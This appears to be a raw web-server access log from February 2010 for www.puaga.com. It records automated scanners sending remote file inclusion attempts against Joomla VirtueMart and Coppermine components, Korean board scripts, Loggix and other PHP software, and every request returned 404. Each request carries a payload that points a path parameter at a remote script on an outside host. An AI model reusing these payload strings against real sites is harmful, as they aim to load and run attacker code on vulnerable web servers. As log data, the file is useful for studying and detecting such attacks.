62.140.23.24 - - [12/Feb/2010:05:25:54 -0800] "GET /administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [12/Feb/2010:05:25:54 -0800] "GET /logs/access_100124.log//administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [12/Feb/2010:05:25:54 -0800] "GET /logs//administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [12/Feb/2010:05:25:58 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [12/Feb/2010:05:26:06 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [12/Feb/2010:05:26:06 -0800] "GET /skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [12/Feb/2010:05:26:10 -0800] "GET /logs/access_100120.log%20%20//skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [12/Feb/2010:05:26:15 -0800] "GET /skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [12/Feb/2010:05:26:15 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [12/Feb/2010:05:26:19 -0800] "GET /logs/access_100120.log%20%20//skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:26:29 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:26:29 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:26:29 -0800] "GET /logs/access_100128.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:26:31 -0800] "GET /logs/access_100129.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:05:26:36 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:05:26:36 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:05:26:36 -0800] "GET /logs/access_100204.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:26:54 -0800] "GET /logs/access_100123.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:26:54 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:26:54 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:26:54 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:26:54 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:26:54 -0800] "GET /logs/access_100123.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [12/Feb/2010:05:26:56 -0800] "GET /logs/access_100129.log/myevent.php?myevent_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [12/Feb/2010:05:26:56 -0800] "GET /logs/access_091231.log/myevent.php?myevent_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [12/Feb/2010:05:27:00 -0800] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [12/Feb/2010:05:27:00 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [12/Feb/2010:05:27:00 -0800] "GET /logs/access_100123.log%20%20//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:27:01 -0800] "GET /logs/access_100104.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [12/Feb/2010:05:27:02 -0800] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [12/Feb/2010:05:27:02 -0800] "GET /logs/access_100123.log%20%20//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [12/Feb/2010:05:27:02 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:27:02 -0800] "GET /logs/access_100104.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:27:04 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:27:04 -0800] "GET /logs/access_100123.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:27:04 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:27:07 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:27:07 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:27:07 -0800] "GET /logs/access_100123.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [12/Feb/2010:05:27:16 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [12/Feb/2010:05:27:16 -0800] "GET /logs/access_100123.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [12/Feb/2010:05:27:17 -0800] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [12/Feb/2010:05:27:22 -0800] "GET /logs/access_100123.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [12/Feb/2010:05:27:22 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:05:27:22 -0800] "GET /logs/access_100128.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [12/Feb/2010:05:27:25 -0800] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.77.228.201 - - [12/Feb/2010:05:27:27 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.77.228.201 - - [12/Feb/2010:05:27:27 -0800] "GET /logs/access_100129.log%20%20//bbs/write_update.php?board_skin_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.77.228.201 - - [12/Feb/2010:05:27:27 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [12/Feb/2010:05:27:32 -0800] "GET /logs/access_100109.log/myevent.php?myevent_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:27:38 -0800] "GET /logs/access_100104.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.77.228.201 - - [12/Feb/2010:05:27:52 -0800] "GET /logs/access_100202.log%20%20//bbs/write_update.php?board_skin_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:05:28:04 -0800] "GET /logs/access_100111.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:28:29 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:28:29 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:28:29 -0800] "GET /logs/access_100204.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:28:29 -0800] "GET /logs/access_100123.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:28:38 -0800] "GET /logs/access_100123.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:28:38 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:28:38 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:28:53 -0800] "GET /logs/access_100114.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [12/Feb/2010:05:29:27 -0800] "GET /logs/access_100118.log%20%20//skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:29:41 -0800] "GET /logs/access_100114.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:29:43 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [12/Feb/2010:05:29:47 -0800] "GET /logs/access_100118.log%20%20//skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:29:47 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:29:47 -0800] "GET /logs/access_100123.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:29:47 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:29:48 -0800] "GET /logs/access_100104.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [12/Feb/2010:05:29:48 -0800] "GET /logs/access_100118.log%20%20//skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:29:51 -0800] "GET /logs/access_100123.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:29:51 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:29:51 -0800] "GET /logs/access_100104.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:30:05 -0800] "GET /logs/access_100104.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:05:30:32 -0800] "GET /logs/access_100130.log///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [12/Feb/2010:05:30:33 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://3040club.com/data/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [12/Feb/2010:05:30:33 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://3040club.com/data/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [12/Feb/2010:05:30:33 -0800] "GET /logs/access_100115.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://3040club.com/data/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:05:30:36 -0800] "GET /logs/access_100125.log///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:05:30:39 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:05:30:39 -0800] "GET /logs/access_100203.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:05:30:39 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:31:04 -0800] "GET /logs/access_100114.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.222.129.18 - - [12/Feb/2010:05:31:20 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.222.129.18 - - [12/Feb/2010:05:31:21 -0800] "GET /logs/access_100124.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.222.129.18 - - [12/Feb/2010:05:31:22 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:31:28 -0800] "GET /logs/access_100104.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:31:34 -0800] "GET /logs/access_100202.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:05:31:35 -0800] "GET /logs/access_100202.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:05:31:40 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.222.129.18 - - [12/Feb/2010:05:32:09 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.222.129.18 - - [12/Feb/2010:05:32:10 -0800] "GET /logs/access_100124.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.222.129.18 - - [12/Feb/2010:05:32:10 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.222.129.18 - - [12/Feb/2010:05:32:16 -0800] "GET /logs/access_100127.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.222.129.18 - - [12/Feb/2010:05:32:47 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.222.129.18 - - [12/Feb/2010:05:32:48 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.222.129.18 - - [12/Feb/2010:05:32:55 -0800] "GET /logs/access_100124.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.222.129.18 - - [12/Feb/2010:05:33:04 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.222.129.18 - - [12/Feb/2010:05:33:07 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.222.129.18 - - [12/Feb/2010:05:33:08 -0800] "GET /logs/access_100124.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.222.129.18 - - [12/Feb/2010:05:33:52 -0800] "GET /logs/access_100127.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.50 - - [12/Feb/2010:05:34:56 -0800] "GET /logs/access_100109.log/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
